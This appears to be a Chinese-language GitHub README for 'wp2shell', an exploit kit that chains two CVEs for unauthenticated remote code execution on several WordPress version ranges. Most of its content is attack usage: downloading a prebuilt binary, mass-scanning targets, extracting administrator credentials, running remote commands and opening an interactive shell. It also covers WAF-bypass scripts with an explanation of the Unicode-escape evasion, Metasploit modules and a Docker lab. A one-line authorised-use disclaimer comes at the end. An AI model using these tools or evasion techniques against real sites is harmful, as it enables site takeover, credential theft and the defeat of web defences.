WordPress 预认证 RCE 漏洞利用 + 扫描器 + WAF 绕过 | CVE-2026-63030 + CVE-2026-60137 | Go + Python + Metasploit 模块 + Docker 实验环境
___ __ ____
_ _____ |__ \ ___/ /_ ___ / / /
| | /| / / _ \ __/ // __/ __ \/ _ \/ / /
| |/ |/ / __// __//_ / / / / __/ / /
|__/|__/\___//____//__/_/ /_/\___/_/_/
WordPress 未认证 RCE — CVE-2026-63030 + CVE-2026-60137
作者:Venexy (M4xSec)
对 WordPress 6.8.0–6.8.5、6.9.0–6.9.4、7.0.0–7.0.1 的未认证远程代码执行。已在 6.8.6、6.9.5、7.0.2 中修复。
# 预编译二进制文件(最快)
curl -sL https://github.com/M4xSec/wp2shell-Exploit-Waf-Bypass/releases/download/v1.0.0/wp2shell-linux-amd64 -o wp2shell && chmod +x wp2shell
# 或从源码构建
go build -o wp2shell go-scanner/wp2shell-master.go
parse_request() 伪造管理员go-scanner/wp2shell-master.go)一体化二进制程序 — 扫描、检测、读取、利用、交互式 Shell。
go build -o wp2shell-master go-scanner/wp2shell-master.go
# 批量扫描
./wp2shell-master scan -f targets.txt -j -t 20
# 确认 SQLi
./wp2shell-master check https://target.com --waf --delay 3.0
# 提取管理员凭据
./wp2shell-master read https://target.com --preset users
# 未认证 RCE(无需密码)
./wp2shell-master rce https://target.com --cmd id -y --waf --stealth
# 交互式 Shell
./wp2shell-master rce https://target.com -i -y
waf-bypass/)通过 JSON Unicode 转义 SQL 关键字来实现 Cloudflare/ModSecurity 绕过的独立脚本。
core.py — 带 WAF 绕过的共享盲 SQLi 引擎dump_version.py — 提取 @@versiondump_dbname.py — 提取 DATABASE()dump_tables.py — 枚举数据表dump_columns.py — 枚举列rce_shell.py — 带 WAF 绕过的完整 RCE 链metasploit-modules/)本地安装:
mkdir -p ~/.msf4/modules/exploits/multi/http
mkdir -p ~/.msf4/modules/auxiliary/scanner/http
cp metasploit-modules/wp2shell_rce.rb ~/.msf4/modules/exploits/multi/http/wp_wordpress_batch_rce.rb
cp metasploit-modules/wp2shell_scanner.rb ~/.msf4/modules/auxiliary/scanner/http/wp_wordpress_batch_sqli.rb
Cloudflare WAF 会检查原始 JSON 字节,但不会在模式匹配前解码 \uXXXX 转义序列。WordPress 的 PHP json_decode() 会透明地解码这些序列。
SLEEP → SLEEP — 绕过关键字检测: 代替 http://:)— 更短,避免 URI 模式规则/wp-json/batch/v1 固定链接路径 — 避免 ?rest_route= 被拦截Origin + Referer 请求头 — 满足 CORS/同源检查cd lab
docker compose up -d --build
# WordPress 6.9.0 位于 http://localhost:8888
# 管理员:admin / Summer2026!
带 Cloudflare 风格规则的 ModSecurity CRS(OWASP)— 已确认 Unicode 绕过有效。
cd lab/waf
docker compose up -d --build
# WAF 后的 WordPress:http://localhost:9999
此工具仅用于授权的安全测试。只能针对您拥有或已获得明确书面许可的系统进行测试。未经授权的访问是违法的。
MIT